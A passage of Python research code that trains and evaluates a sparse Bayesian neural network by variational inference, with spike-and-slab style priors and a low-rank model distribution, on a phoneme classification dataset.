used!\")\n\n# define the parameters\nBATCH_SIZE = 100\nTEST_BATCH_SIZE = 100\nCOND_OPT = False\nCLASSES = 5\n# TRAIN_EPOCHS = 250\nSAMPLES = 1\nTEST_SAMPLES = 10\nTEMPER = 0.001\nTEMPER_PRIOR = 0.001\nepochs = 250\npepochs = 50\n\n#prepare the data\ndata = pd.read_csv('http://www.uio.no/studier/emner/matnat/math/STK2100/data/phoneme.data')\ndata = data.drop(columns=[\"row.names\"])\ndata = pd.concat([data,data.g.astype(\"category\").cat.codes.astype(int)],sort=False, axis=1) #get_dummies(data['g'], prefix='phoneme')],sort=False, axis=1)\ndata = data.drop(columns=[\"g\",\"speaker\"])\ndata = data.values\n\nnp.random.seed(40590)\n\ntr_ids = np.random.choice(4509, 3500, replace = False)\nte_ids = np.setdiff1d(np.arange(4509),tr_ids)[0:1000]\n\ndtrain = data[tr_ids,:]\n\ndata_mean = dtrain.mean(axis=0)[0:256]\ndata_std = dtrain.std(axis=0)[0:256]\n\ndata[:,0:256] = (data[:,0:256] - data_mean)/data_std\n\n\n\ndtrain = data[tr_ids,:]\ndtest = data[te_ids,:]\n\n\nTRAIN_SIZE = len(tr_ids)\nTEST_SIZE = len(te_ids)\nNUM_BATCHES = TRAIN_SIZE/BATCH_SIZE\nNUM_TEST_BATCHES = len(te_ids)/BATCH_SIZE\n\n\n\n#assert (TRAIN_SIZE % BATCH_SIZE) == 0\n#assert (TEST_SIZE % TEST_BATCH_SIZE) == 0\n\n\ndef probit(x):\n return torch.distributions.Normal(0, 1).cdf(x)\n\n\n# define Gaussian distribution\nclass Gaussian(object):\n def __init__(self, mu, rho):\n super().__init__()\n self.mu = mu\n self.rho = rho\n self.normal = torch.distributions.Normal(0, 1)\n\n @property\n def sigma(self):\n return torch.log1p(torch.exp(self.rho))\n #return torch.exp(self.rho)\n\n def rsample(self):\n epsilon = self.normal.sample(self.rho.size()).to(DEVICE)\n return self.mu + self.sigma * epsilon\n\n def log_prob(self, input):\n return (-math.log(math.sqrt(2 * math.pi))\n - torch.log(self.sigma)\n - ((input - self.mu) ** 2) / (2 * self.sigma ** 2)).sum()\n\n def log_prob_iid(self, input):\n return (-math.log(math.sqrt(2 * math.pi))\n - torch.log(self.sigma)\n - ((input - self.mu) ** 2) / (2 * self.sigma ** 2))\n\n def full_log_prob(self, input, gamma):\n return (torch.log(gamma * (torch.exp(self.log_prob_iid(input)))\n + (1 - gamma) + 1e-8)).sum()\n\n\n\n#define low rank multivariate Gaussian distribution\nclass LowRankMultivariateNormal(torch.distributions.LowRankMultivariateNormal):\n pass\n # rsample, log_prob, etc. available by inheritance\n\n\n# define Bernoulli distribution\nclass Bernoulli(object):\n def __init__(self, alpha):\n super().__init__()\n self.alpha = alpha\n self.exact = False\n\n def rsample(self):\n if self.exact:\n gamma = torch.distributions.Bernoulli(self.alpha).sample().to(DEVICE)\n else:\n gamma = torch.distributions.RelaxedBernoulli(probs=self.alpha, temperature=TEMPER_PRIOR).rsample()\n return gamma\n\n def sample(self):\n return torch.distributions.Bernoulli(self.alpha).sample().to(DEVICE)\n\n def log_prob(self, input):\n if self.exact:\n gamma = torch.round(input.detach())\n output = (gamma * torch.log(self.alpha + 1e-8) + (1 - gamma) * torch.log(1 - self.alpha + 1e-8)).sum()\n else:\n output = (input * torch.log(self.alpha + 1e-8) + (1 - input) * torch.log(1 - self.alpha + 1e-8)).sum()\n return output\n\n\n# define Normal-Gamma distribution\nclass GaussGamma(object):\n def __init__(self, a, b):\n super().__init__()\n self.a = a\n self.b = b\n self.exact = False\n self.sigma = torch.distributions.Gamma(self.a, self.b)\n\n def log_prob(self, input, gamma):\n tau = self.sigma.rsample()\n if self.exact:\n gamma1 = torch.round(gamma.detach())\n output = (gamma1 * (self.a * torch.log(self.b) + (self.a - 0.5) * tau - self.b * tau - torch.lgamma(\n self.a) - 0.5 * torch.log(torch.tensor(2 * np.pi))) - tau * torch.pow(input, 2) + (\n 1 - gamma1) + 1e-8).sum()\n else:\n output = (gamma * (self.a * torch.log(self.b) + (self.a - 0.5) * tau - self.b * tau - torch.lgamma(\n self.a) - 0.5 * torch.log(torch.tensor(2 * np.pi))) - tau * torch.pow(input, 2) + (\n 1 - gamma) + 1e-8).sum()\n return output\n\n\n# define BetaBinomial distibution\nclass BetaBinomial(object):\n def __init__(self, pa, pb):\n super().__init__()\n self.pa = pa\n self.pb = pb\n self.exact = False\n\n def log_prob(self, input, pa, pb):\n if self.exact:\n gamma = torch.round(input.detach())\n else:\n gamma = input\n return (torch.lgamma(torch.ones_like(input)) + torch.lgamma(gamma + torch.ones_like(input) * self.pa)\n + torch.lgamma(torch.ones_like(input) * (1 + self.pb) - gamma) + torch.lgamma(\n torch.ones_like(input) * (self.pa + self.pb))\n - torch.lgamma(torch.ones_like(input) * self.pa + gamma)\n - torch.lgamma(torch.ones_like(input) * 2 - gamma) - torch.lgamma(\n torch.ones_like(input) * (1 + self.pa + self.pb))\n - torch.lgamma(torch.ones_like(input) * self.pa) - torch.lgamma(torch.ones_like(input) * self.pb)).sum()\n\n def rsample(self):\n gamma = torch.distributions.RelaxedBernoulli(\n probs=torch.distributions.Beta(self.pa, self.pb).rsample().to(DEVICE), temperature=0.001).rsample().to(\n DEVICE)\n return gamma\n\n\n# define the linear layer for the BNN\nclass BayesianLinear(nn.Module):\n def __init__(self, in_features, out_features, layer_id):\n super().__init__()\n\n # configuration of the layer\n self.layer = layer_id\n self.in_features = in_features\n self.out_features = out_features\n\n # weight parameters\n self.weight_mu = nn.Parameter(torch.Tensor(out_features, in_features).uniform_(-0.2, 0.2))\n self.weight_rho = nn.Parameter(torch.Tensor(out_features, in_features).uniform_(-5, -4))\n self.weight = Gaussian(self.weight_mu, self.weight_rho)\n # weight priors\n self.weight_a = nn.Parameter(torch.Tensor(1).uniform_(1, 1.1))\n self.weight_b = nn.Parameter(torch.Tensor(1).uniform_(1, 1.1))\n self.weight_prior = GaussGamma(self.weight_a, self.weight_b)\n\n # model parameters\n self.model_mu = nn.Parameter(torch.Tensor(out_features, in_features).uniform_(-0.0001, 0.0001).to(DEVICE))\n self.model_sigma = nn.Parameter(torch.Tensor(out_features, in_features).uniform_(10, 20).to(DEVICE))\n self.model_fact = nn.Parameter(\n torch.Tensor(out_features, in_features).uniform_(-10, 10).unsqueeze(-1).to(DEVICE))\n self.alpha = torch.Tensor(out_features, in_features).uniform_(0.999, 0.9999)\n self.lambdal = torch.Tensor(torch.Tensor(out_features, in_features).uniform_(0, 1))\n self.gamma = Bernoulli(self.alpha)\n self.gammas = torch.Tensor(out_features, in_features).uniform_(0.99, 1)\n self.lambdaD = LowRankMultivariateNormal(loc=self.model_mu, cov_factor=self.model_fact,\n cov_diag=self.model_sigma)\n # model priors\n self.pa = nn.Parameter(torch.Tensor(1).uniform_(1, 3.1))\n self.pb = nn.Parameter(torch.Tensor(1).uniform_(1, 3.1))\n self.gamma_prior = BetaBinomial(pa=self.pa, pb=self.pb)\n\n # bias (intercept) parameters\n self.bias_mu = nn.Parameter(torch.Tensor(out_features).uniform_(-0.2, 0.2))\n self.bias_rho = nn.Parameter(torch.Tensor(out_features).uniform_(-5, -4))\n self.bias = Gaussian(self.bias_mu, self.bias_rho)\n # bias (intercept) priors\n self.bias_a = nn.Parameter(torch.Tensor(out_features).uniform_(1, 1.1))\n self.bias_b = nn.Parameter(torch.Tensor(out_features).uniform_(1, 1.1))\n self.bias_prior = GaussGamma(self.bias_a, self.bias_b)\n\n # scalars\n self.log_prior = 0\n self.log_variational_posterior = 0\n self.lagrangian = 0\n\n # forward path\n def forward(self, input, cgamma, sample=False, medimean=False, calculate_log_probs=False):\n # if sampling\n if self.training or sample:\n self.gammas = cgamma\n weight = cgamma * (self.weight.rsample())\n bias = self.bias.rsample()\n # if mean of the given model (e.g.) median probability model\n elif medimean:\n weight = cgamma * self.weight.mu\n bias = self.bias.mu\n # if joint mean in the space of models and parameters (for a given alpha vector)\n else:\n weight = self.alpha * self.weight.mu\n bias = self.bias.mu\n # calculate the losses\n if self.training or calculate_log_probs:\n\n self.log_prior = self.weight_prior.log_prob(weight, cgamma) + self.bias_prior.log_prob(bias,\n torch.ones_like(\n bias)) + self.gamma_prior.log_prob(\n cgamma, pa=self.pa, pb=self.pb)\n self.log_variational_posterior = self.weight.full_log_prob(input=weight,\n gamma=cgamma) + self.gamma.log_prob(\n cgamma) + self.bias.log_prob(bias)\n else:\n self.log_prior, self.log_variational_posterior\n # propogate\n return F.linear(input, weight, bias)\n\n # deine the whole BNN\n\n\nclass BayesianNetwork(nn.Module):\n def __init__(self):\n super().__init__()\n # set the architecture\n self.l1 = BayesianLinear(256, 400, 1)\n self.l2 = BayesianLinear(400, 600, 1)\n self.l3 = BayesianLinear(600, 5, 1)\n\n def forward(self, x, g1, g2, g3, sample=False, medimean=False):\n x = x.view(-1, 256)\n x = F.relu(self.l1.forward(x, g1, sample, medimean))\n x = F.relu(self.l2.forward(x, g2, sample, medimean))\n x = F.log_softmax(F.relu(self.l3.forward(x, g3, sample, medimean)), dim=1)\n return x\n\n def log_prior(self):\n return self.l1.log_prior \\\n + self.l2.log_prior \\\n + self.l3.log_prior\n\n def log_variational_posterior(self):\n return self.l1.log_variational_posterior \\\n + self.l2.log_variational_posterior \\\n + self.l3.log_variational_posterior\n\n # sample the marginal likelihood lower bound\n def sample_elbo(self, input, target, samples=SAMPLES):\n outputs = torch.zeros(samples, BATCH_SIZE, CLASSES).to(DEVICE)\n log_priors = torch.zeros(samples).to(DEVICE)\n log_variational_posteriors = torch.zeros(samples).to(DEVICE)\n negative_log_likelihoods = torch.zeros(samples).to(DEVICE)\n for i in range(samples):\n # get the inclusion probabilities for all layers\n self.l1.lambdal = self.l1.lambdaD.rsample().to(DEVICE)\n self.l2.lambdal = self.l2.lambdaD.rsample().to(DEVICE)\n self.l3.lambdal = self.l3.lambdaD.rsample().to(DEVICE)\n self.l1.alpha = probit(self.l1.lambdal) # 1/(1+torch.exp(-self.l1.lambdal))\n self.l1.gamma.alpha = self.l1.alpha\n self.l2.alpha = probit(self.l2.lambdal) # 1/(1+torch.exp(-self.l2.lambdal))\n self.l2.gamma.alpha = self.l2.alpha\n self.l3.alpha = probit(self.l3.lambdal) # 1/(1+torch.exp(-self.l3.lambdal))\n self.l3.gamma.alpha = self.l3.alpha\n\n # sample the model\n cgamma1 = self.l1.gamma.rsample().to(DEVICE)\n cgamma2 = self.l2.gamma.rsample().to(DEVICE)\n cgamma3 = self.l3.gamma.rsample().to(DEVICE)\n\n # get the results\n outputs[i] = self.forward(input, g1=cgamma1, g2=cgamma2, g3=cgamma3, sample=True, medimean=False)\n log_priors[i] = self.log_prior()\n log_variational_posteriors[i] = self.log_variational_posterior()\n negative_log_likelihoods[i] = F.nll_loss(outputs[i], target, reduction='sum')\n\n # the current log prior\n log_prior = log_priors.mean()\n # the current log variational posterior\n log_variational_posterior = log_variational_posteriors.mean()\n # the current negative log likelihood\n negative_log_likelihood = negative_log_likelihoods.mean()\n\n # the current ELBO\n loss = negative_log_likelihood + (log_variational_posterior - log_prior) / NUM_BATCHES\n return loss, log_prior, log_variational_posterior, negative_log_likelihood\n\n\n# save the relevant parameters histograms\ndef write_weight_histograms(epoch, i):\n writer.add_histogram('histogram/mfw1_mu'+prefix, net.l1.weight_mu, epoch + i * epochs)\n # writer.add_histogram('histogram/mfw1_rho', net.l1.weight_rho,epoch+i*epochs)\n writer.add_histogram('histogram/mfw2_mu'+prefix, net.l2.weight_mu, epoch + i * epochs)\n # writer.add_histogram('histogram/mfw2_rho', net.l2.weight_rho,epoch+i*epochs)\n writer.add_histogram('histogram/mfw3_mu'+prefix, net.l3.weight_mu, epoch + i * epochs)\n # writer.add_histogram('histogram/mfw3_rho', net.l3.weight_rho,epoch+i*epochs)\n writer.add_histogram('histogram/mfb1_mu'+prefix, net.l1.bias_mu, epoch + i * epochs)\n # writer.add_histogram('histogram/mfb1_rho', net.l1.bias_rho,epoch+i*epochs)\n writer.add_histogram('histogram/mfb2_mu'+prefix, net.l2.bias_mu, epoch + i * epochs)\n # writer.add_histogram('histogram/mfb2_rho', net.l2.bias_rho,epoch+i*epochs)\n writer.add_histogram('histogram/mfb3_mu'+prefix, net.l3.bias_mu, epoch + i * epochs)\n # writer.add_histogram('histogram/mfb3_rho', net.l3.bias_rho,epoch+i*epochs)\n\n\n# save the relevant losses\ndef write_loss_scalars(epoch, i, batch_idx, loss, log_prior, log_variational_posterior, negative_log_likelihood):\n writer.add_scalar('logs/mloss'+prefix, loss, epoch * NUM_BATCHES + batch_idx)\n writer.add_scalar('logs/mcomplexity_cost'+prefix, log_variational_posterior - log_prior,\n i * epochs * NUM_BATCHES + epoch * NUM_BATCHES + batch_idx)\n writer.add_scalar('logs/mlog_prior'+prefix, log_prior, i * epochs * NUM_BATCHES + epoch * NUM_BATCHES + batch_idx)\n writer.add_scalar('logs/mlog_variational_posterior'+prefix, log_variational_posterior,\n i * epochs * NUM_BATCHES + epoch * NUM_BATCHES + batch_idx)\n writer.add_scalar('logs/mnegative_log_likelihood'+prefix, negative_log_likelihood,\n i * epochs * NUM_BATCHES + epoch * NUM_BATCHES + batch_idx)\n\n\n# Stochastic Variational Inference iteration\ndef train(net, optimizer, epoch, i, batch_size = BATCH_SIZE):\n net.train()\n old_batch = 0\n for batch in range(int(np.ceil(dtrain.shape[0] / batch_size))):\n batch = (batch + 1)\n _x = dtrain[old_batch: batch_size * batch,0:256]\n _y = dtrain[old_batch: batch_size * batch, 256:257]\n old_batch = batch_size * batch\n #print(_x.shape)\n #print(_y.shape)\n\n data = Variable(torch.FloatTensor(_x)).cuda()\n target = Variable(torch.transpose(torch.LongTensor(_y),0,1).cuda())[0]\n\n\n net.zero_grad()\n loss, log_prior, log_variational_posterior, negative_log_likelihood = net.sample_elbo(data, target)\n loss.backward(retain_graph=True)\n\n if COND_OPT:\n net.l1.weight_mu.grad = net.l1.weight_mu.grad * net.l1.gammas.data\n net.l2.weight_mu.grad = net.l2.weight_mu.grad * net.l2.gammas.data\n net.l3.weight_mu.grad = net.l3.weight_mu.grad * net.l3.gammas.data\n optimizer.step()\n write_loss_scalars(epoch, i, batch, loss, log_prior, log_variational_posterior, negative_log_likelihood)\n\n\n# Test on the unseen data\ndef test_ensemble(net, batch_size = BATCH_SIZE):\n net.eval()\n correct1 = 0\n correct2 = 0\n correct3 = 0\n correct4 = 0\n cases3 = 0\n cases4 = 0\n ctr = 0\n corrects = np.zeros(TEST_SAMPLES + 12, dtype=int)\n spars = np.zeros(TEST_SAMPLES)\n gt1 = np.zeros((400, 256))\n gt2 = np.zeros((600, 400))\n gt3 = np.zeros((5, 600))\n\n old_batch = 0\n for batch in range(int(np.ceil(dtest.shape[0] / batch_size))):\n batch = (batch + 1)\n _x = dtest[old_batch: batch_size * batch, 0:256]\n _y = dtest[old_batch: batch_size * batch, 256:257]\n\n old_batch = batch_size * batch\n\n #print(_x.shape)\n #print(_y.shape)\n\n data = Variable(torch.FloatTensor(_x)).cuda()\n target = Variable(torch.transpose(torch.LongTensor(_y), 0, 1).cuda())[0]\n\n outputs = torch.zeros(TEST_SAMPLES + 12, TEST_BATCH_SIZE, CLASSES).to(DEVICE)\n for i in range(TEST_SAMPLES):\n\n # get the inclusion probabilities for all layers\n net.l1.lambdal = net.l1.lambdaD.rsample().to(DEVICE)\n net.l2.lambdal = net.l2.lambdaD.rsample().to(DEVICE)\n net.l3.lambdal = net.l3.lambdaD.rsample().to(DEVICE)\n net.l1.alpha = probit(net.l1.lambdal) # 1/(1+torch.exp(-net.l1.lambdal))\n net.l1.gamma.alpha = net.l1.alpha\n net.l2.alpha = probit(net.l2.lambdal) # 1/(1+torch.exp(-net.l2.lambdal))\n net.l2.gamma.alpha = net.l2.alpha\n net.l3.alpha = probit(net.l3.lambdal) # 1/(1+torch.exp(-net.l3.lambdal))\n net.l3.gamma.alpha = net.l3.alpha\n\n # sample the model\n g1 = net.l1.gamma.rsample().to(DEVICE)\n g2 = net.l2.gamma.rsample().to(DEVICE)\n g3 = net.l3.gamma.rsample().to(DEVICE)\n\n ctr += 1\n spars[i] = spars[i] + ((torch.sum(g1 > 0.5).cpu().detach().numpy() + torch.sum(\n g2 > 0.5).cpu().detach().numpy() + torch.sum(g3 > 0.5).cpu().detach().numpy()) / (\n 5 * 600 + 400 * 600 + 400 * 256))\n gt1 = gt1 + (g1 > 0.5).cpu().numpy()\n gt2 = gt2 + (g2 > 0.5).cpu().numpy()\n gt3 = gt3 + (g3 > 0.5).cpu().numpy()\n outputs[i] = net.forward(data, sample=True, medimean=False, g1=net.l1.gamma.rsample(),\n g2=net.l2.gamma.rsample(), g3=net.l3.gamma.rsample())\n\n\n outputs[i + 10] = net.forward(data, sample=True, medimean=False,\n g1=(net.l1.alpha.data > 0.5).type(torch.cuda.FloatTensor).to(DEVICE),\n g2=(net.l2.alpha.data > 0.5).type(torch.cuda.FloatTensor).to(DEVICE),\n g3=(net.l3.alpha.data > 0.5).type(torch.cuda.FloatTensor).to(DEVICE))\n if (i == 0):\n mydata_means = sigmoid(outputs[i].detach().cpu().numpy())\n for j in range(TEST_BATCH_SIZE):\n mydata_means[j] /= np.sum(mydata_means[j])\n else:\n tmp = sigmoid(outputs[i].detach().cpu().numpy())\n for j in range(TEST_BATCH_SIZE):\n tmp[j] /= np.sum(tmp[j])\n # print(sum(tmp[j]))\n mydata_means = mydata_means + tmp\n if (i == 0):\n mydata_means_med = sigmoid(outputs[i + 10].detach().cpu().numpy())\n for j in range(TEST_BATCH_SIZE):\n mydata_means_med[j] /= np.sum(mydata_means_med[j])\n else:\n tmp = sigmoid(outputs[i + 10].detach().cpu().numpy())\n for j in range(TEST_BATCH_SIZE):\n tmp[j] /= np.sum(tmp[j])\n # print(sum(tmp[j]))\n mydata_means_med = mydata_means_med + tmp\n mydata_means /= TEST_SAMPLES\n mydata_means_med /= TEST_SAMPLES\n\n outputs[TEST_SAMPLES + 11] = net(data, sample=False, medimean=True,\n g1=(net.l1.alpha.data > 0.5).type(torch.cuda.FloatTensor).to(DEVICE),\n g2=(net.l2.alpha.data > 0.5).type(torch.cuda.FloatTensor).to(DEVICE),\n g3=(net.l3.alpha.data > 0.5).type(torch.cuda.FloatTensor).to(DEVICE))\n outputs[TEST_SAMPLES + 10] = net(data, sample=False, medimean=False, g1=net.l1.gamma.rsample(),\n g2=net.l2.gamma.rsample(), g3=net.l3.gamma.rsample())\n\n output1 = outputs[0:9].mean(0)\n output2 = outputs[10:19].mean(0)\n\n preds = outputs.max(2, keepdim=True)[1]\n pred1 = output1.max(1, keepdim=True)[1] # index of max log-probability\n pred2 = output2.max(1, keepdim=True)[1]\n\n if cases3 == 0:\n cases3 += 1\n if cases4 == 0:\n cases4 += 1\n\n #print(output1)\n #print(pred1)\n #print(target.view_as(pred2))\n\n corrects += preds.eq(target.view_as(pred1)).sum(dim=1).squeeze().cpu().numpy()\n correct1 += pred1.eq(target.view_as(pred1)).sum().item()\n correct2 += pred2.eq(target.view_as(pred2)).sum().item()\n\n # print(mydata_means[1][1])\n for jj in range(TEST_BATCH_SIZE):\n if mydata_means[jj][pred1.detach().cpu().numpy()[jj]] >= 0.95:\n correct3 += pred1[jj].eq(target.view_as(pred1)[jj]).sum().item()\n cases3 += 1\n\n if mydata_means_med[jj][pred2.detach().cpu().numpy()[jj]] >= 0.95:\n correct4 += pred2[jj].eq(target.view_as(pred2)[jj]).sum().item()\n cases4 += 1\n\n for index, num in enumerate(corrects):\n if index < TEST_SAMPLES:\n print('Component {} Accuracy: {}/{}'.format(index, num, TEST_SIZE))\n elif index < TEST_SAMPLES + 10:\n print('Component MPM {} Accuracy: {}/{}'.format(index, num, TEST_SIZE))\n elif index == TEST_SAMPLES + 10:\n print('Posterior Mode Accuracy: {}/{}'.format(num, TEST_SIZE))\n elif index == TEST_SAMPLES + 11:\n print('Posterior Mean Accuracy: {}/{}'.format(num, TEST_SIZE))\n elif index == TEST_SAMPLES + 12:\n print('Posterior MPM Mean Accuracy: {}/{}'.format(num, TEST_SIZE))\n\n print('Ensemble Accuracy: {}/{}'.format(correct1, TEST_SIZE))\n print('Median Ensemble Accuracy: {}/{}'.format(correct2, TEST_SIZE))\n\n corrects = np.append(corrects, correct1)\n corrects = np.append(corrects, correct2)\n\n corrects = np.append(corrects, correct3 / cases3)\n corrects = np.append(corrects, cases3)\n corrects = np.append(corrects, correct4 / cases4)\n corrects = np.append(corrects, cases4)\n\n ps = ((np.sum(gt1 > 0) + np.sum(gt2 > 0) + np.sum(gt3 > 0)) / (5 * 600 + 400 * 600 + 400 * 256)) / 10\n print(spars / ctr)\n\n corrects = np.append(corrects, ps)\n corrects = np.append(corrects, np.median(spars) / ctr)\n return corrects\n\n\ndef cdf(x, plot=True, *args, **kwargs):\n x = sorted(x)\n y = np.arange(len(x)) / len(x)\n return plt.plot(x, y, *args, **kwargs) if plot else (x, y)\n\n\ndef sigmoid(x):\n return (1 / (1 + np.exp(-x)))\n\npepochs = 50\n\n\ndef ptrain(net, optimizer, epoch, i, batch_size = BATCH_SIZE):\n net.train()\n if epoch == 0: # write initial distributions\n # write_weight_histograms(epoch,i)\n net.l1.model_mu.requires_grad = False\n net.l2.model_mu.requires_grad = False\n net.l3.model_mu.requires_grad = False\n net.l1.model_sigma.requires_grad = False\n net.l2.model_sigma.requires_grad = False\n net.l3.model_sigma.requires_grad = False\n net.l1.weight_a.requires_grad = False\n net.l2.weight_a.requires_grad = False\n net.l3.weight_a.requires_grad = False\n net.l1.weight_b.requires_grad = False\n net.l2.weight_b.requires_grad = False\n net.l3.weight_b.requires_grad = False\n net.l1.bias_a.requires_grad = False\n net.l2.bias_a.requires_grad = False\n net.l3.bias_a.requires_grad = False\n net.l1.bias_b.requires_grad = False\n net.l2.bias_b.requires_grad = False\n net.l3.bias_b.requires_grad = False\n net.l1.pa.requires_grad = False\n net.l2.pa.requires_grad = False\n net.l3.pa.requires_grad = False\n net.l1.pb.requires_grad = False\n net.l2.pb.requires_grad = False\n net.l3.pb.requires_grad = False\n old_batch = 0\n for batch in range(int(np.ceil(dtrain.shape[0] / batch_size))):\n batch = (batch + 1)\n _x = dtrain[old_batch: batch_size * batch, 0:256]\n _y = dtrain[old_batch: batch_size * batch, 256:257]\n\n data = Variable(torch.FloatTensor(_x)).cuda()\n target = Variable(torch.transpose(torch.LongTensor(_y), 0, 1).cuda())[0]\n\n old_batch = batch_size * batch\n net.zero_grad()\n\n loss, log_prior, log_variational_posterior, negative_log_likelihood = net.sample_elbo(data, target)\n\n loss.backward(retain_graph=True)\n\n if COND_OPT:\n net.l1.weight_mu.grad = net.l1.weight_mu.grad * net.l1.gammas.data\n net.l2.weight_mu.grad = net.l2.weight_mu.grad * net.l2.gammas.data\n net.l3.weight_mu.grad = net.l3.weight_mu.grad * net.l3.gammas.data\n\n optimizer.step()\n write_loss_scalars(epoch, i, batch, loss, log_prior, log_variational_posterior, negative_log_likelihood)\n print(epoch + 1)\n print(loss)\n print(negative_log_likelihood)\n print(net.l1.alpha.cpu().detach().numpy().mean())\n print(net.l2.alpha.cpu().detach().numpy().mean())\n print(net.l3.alpha.cpu().detach().numpy().mean())\n # write_weight_histograms(epoch+1,i)\n\n\nprint(\"Classes loaded\")\n\nepochs=250\n# make inference on 10 networks\nfor i in range(0, 10):\n print(i)\n torch.manual_seed(i)\n net = BayesianNetwork().to(DEVICE)\n optimizer = optim.Adam([\n {'params': net.l1.bias_mu, 'lr': 0.0001},\n {'params': net.l2.bias_mu, 'lr': 0.0001},\n {'params': net.l3.bias_mu, 'lr': 0.0001},\n {'params': net.l1.bias_rho, 'lr': 0.0001},\n {'params': net.l2.bias_rho, 'lr': 0.0001},\n {'params': net.l3.bias_rho, 'lr': 0.0001},\n {'params': net.l1.weight_mu, 'lr': 0.0001},\n {'params': net.l2.weight_mu, 'lr': 0.0001},\n {'params': net.l3.weight_mu, 'lr': 0.0001},\n {'params': net.l1.weight_rho, 'lr': 0.0001},\n {'params': net.l2.weight_rho, 'lr': 0.0001},\n {'params': net.l3.weight_rho, 'lr': 0.0001},\n {'params': net.l1.model_mu, 'lr': 0.01},\n {'params': net.l2.model_mu, 'lr': 0.01},\n {'params': net.l3.model_mu, 'lr': 0.01},\n {'params': net.l1.model_fact, 'lr': 0.01},\n {'params': net.l2.model_fact, 'lr': 0.01},\n {'params': net.l3.model_fact, 'lr': 0.01},\n {'params': net.l1.model_sigma, 'lr': 0.01},\n {'params': net.l2.model_sigma, 'lr': 0.01},\n {'params': net.l3.model_sigma, 'lr': 0.01},\n {'params': net.l1.weight_a, 'lr': 0.00001},\n {'params': net.l2.weight_a, 'lr': 0.00001},\n {'params': net.l3.weight_a, 'lr': 0.00001},\n {'params': net.l1.weight_b, 'lr': 0.00001},\n {'params': net.l2.weight_b, 'lr': 0.00001},\n {'params': net.l3.weight_b, 'lr': 0.00001},\n {'params': net.l1.bias_a, 'lr': 0.00001},\n {'params': net.l2.bias_a, 'lr': 0.00001},\n {'params': net.l3.bias_a, 'lr': 0.00001},\n {'params': net.l1.bias_b, 'lr': 0.00001},\n {'params': net.l2.bias_b, 'lr': 0.00001},\n {'params': net.l3.bias_b, 'lr': 0.00001},\n {'params': net.l1.pa, 'lr': 0.001},\n {'params': net.l2.pa, 'lr': 0.001},\n {'params': net.l3.pa, 'lr': 0.001},\n {'params': net.l1.pb, 'lr': 0.001},\n {'params': net.l2.pb, 'lr': 0.001},\n {'params': net.l3.pb, 'lr': 0.001}\n ], lr=0.0001)\n for epoch in range(epochs):\n if (net.l1.pa / (net.l1.pa + net.l1.pb)).mean() < 0.1 or epoch == 20:\n print(epoch)\n net.l1.gamma_prior.exact = True\n net.l2.gamma_prior.exact = True\n net.l3.gamma_prior.exact = True\n net.l1.bias_prior.exact = True\n net.l2.bias_prior.exact = True\n net.l3.bias_prior.exact = True\n net.l1.weight_prior.exact = True\n net.l1.weight_prior.exact = True\n net.l1.weight_prior.exact = True\n # res = test_ensemble(net)\n # res = np.append(res,net.l1.alpha.cpu().detach().numpy().mean())\n # res = np.append(res,net.l2.alpha.cpu().detach().numpy().mean())\n # res = np.append(res,net.l3.alpha.cpu().detach().numpy().mean())\n # np.savetxt(\"fmaccuracieshalf_\"+str(i)+\".csv\", res, delimiter=\",\")\n optimizer = optim.Adam([\n {'params': net.l1.bias_mu, 'lr': 0.0001},\n {'params': net.l2.bias_mu, 'lr': 0.0001},\n {'params': net.l3.bias_mu, 'lr': 0.0001},\n {'params': net.l1.bias_rho, 'lr': 0.0001},\n {'params': net.l2.bias_rho, 'lr': 0.0001},\n {'params': net.l3.bias_rho, 'lr': 0.0001},\n {'params': net.l1.weight_mu, 'lr': 0.0001},\n {'params': net.l2.weight_mu, 'lr': 0.0001},\n {'params': net.l3.weight_mu, 'lr': 0.0001},\n {'params': net.l1.weight_rho, 'lr': 0.0001},\n {'params': net.l2.weight_rho, 'lr': 0.0001},\n {'params': net.l3.weight_rho, 'lr': 0.0001},\n {'params': net.l1.model_mu, 'lr': 0.0001},\n {'params': net.l2.model_mu, 'lr': 0.0001},\n {'params': net.l3.model_mu, 'lr': 0.0001},\n {'params': net.l1.model_fact, 'lr': 0.0001},\n {'params': net.l2.model_fact, 'lr': 0.0001},\n {'params': net.l3.model_fact, 'lr': 0.0001},\n {'params': net.l1.model_sigma, 'lr': 0.0001},\n {'params': net.l2.model_sigma, 'lr': 0.0001},\n {'params': net.l3.model_sigma, 'lr': 0.0001},\n {'params': net.l1.weight_a, 'lr': 0.00},\n {'params': net.l2.weight_a, 'lr': 0.00},\n {'params': net.l3.weight_a, 'lr': 0.00},\n {'params': net.l1.weight_b, 'lr': 0.00},\n {'params': net.l2.weight_b, 'lr': 0.00},\n {'params': net.l3.weight_b, 'lr': 0.00},\n {'params': net.l1.bias_a, 'lr': 0.00},\n {'params': net.l2.bias_a, 'lr': 0.00},\n {'params': net.l3.bias_a, 'lr': 0.00},\n {'params': net.l1.bias_b, 'lr': 0.00},\n {'params': net.l2.bias_b, 'lr': 0.00},\n {'params': net.l3.bias_b, 'lr': 0.00},\n {'params': net.l1.pa, 'lr': 0.000},\n {'params': net.l2.pa, 'lr': 0.000},\n {'params': net.l3.pa, 'lr': 0.000},\n {'params': net.l1.pb, 'lr': 0.000},\n {'params': net.l2.pb, 'lr': 0.000},\n {'params': net.l3.pb, 'lr': 0.000}\n ], lr=0.0001)\n train(net, optimizer, epoch, i)\n print(net.l1.lambdaD.mean.cpu().detach().numpy().mean())\n print(net.l1.model_mu.cpu().detach().numpy().mean())\n print(net.l2.model_mu.cpu().detach().numpy().mean())\n print(net.l3.model_mu.cpu().detach().numpy().mean())\n print(net.l1.model_sigma.cpu().detach().numpy().mean())\n print(net.l2.model_sigma.cpu().detach().numpy().mean())\n print(net.l3.model_sigma.cpu().detach().numpy().mean())\n print(net.l1.alpha.cpu().detach().numpy().mean())\n print(net.l2.alpha.cpu().detach().numpy().mean())\n print(net.l3.alpha.cpu().detach().numpy().mean())\n print((net.l1.pa / (net.l1.pa + net.l1.pb)).mean())\n print((net.l2.pa / (net.l2.pa + net.l2.pb)).mean())\n print((net.l3.pa / (net.l3.pa + net.l3.pb)).mean())\n\n net.l1.lambdal = net.l1.lambdaD.rsample().to(DEVICE)\n net.l2.lambdal = net.l2.lambdaD.rsample().to(DEVICE)\n net.l3.lambdal = net.l3.lambdaD.rsample().to(DEVICE)\n net.l1.alpha.data = probit(\n net.l1.lambdal) # 1/(1+torch.exp(-net.l1.lambdal.data))#(torch.clamp(self.l1.alpha.data,1e-8 , 1-1e-8))\n net.l2.alpha.data = probit(\n net.l2.lambdal) # 1/(1+torch.exp(-net.l2.lambdal.data))#(torch.clamp(self.l2.alpha.data,1e-8 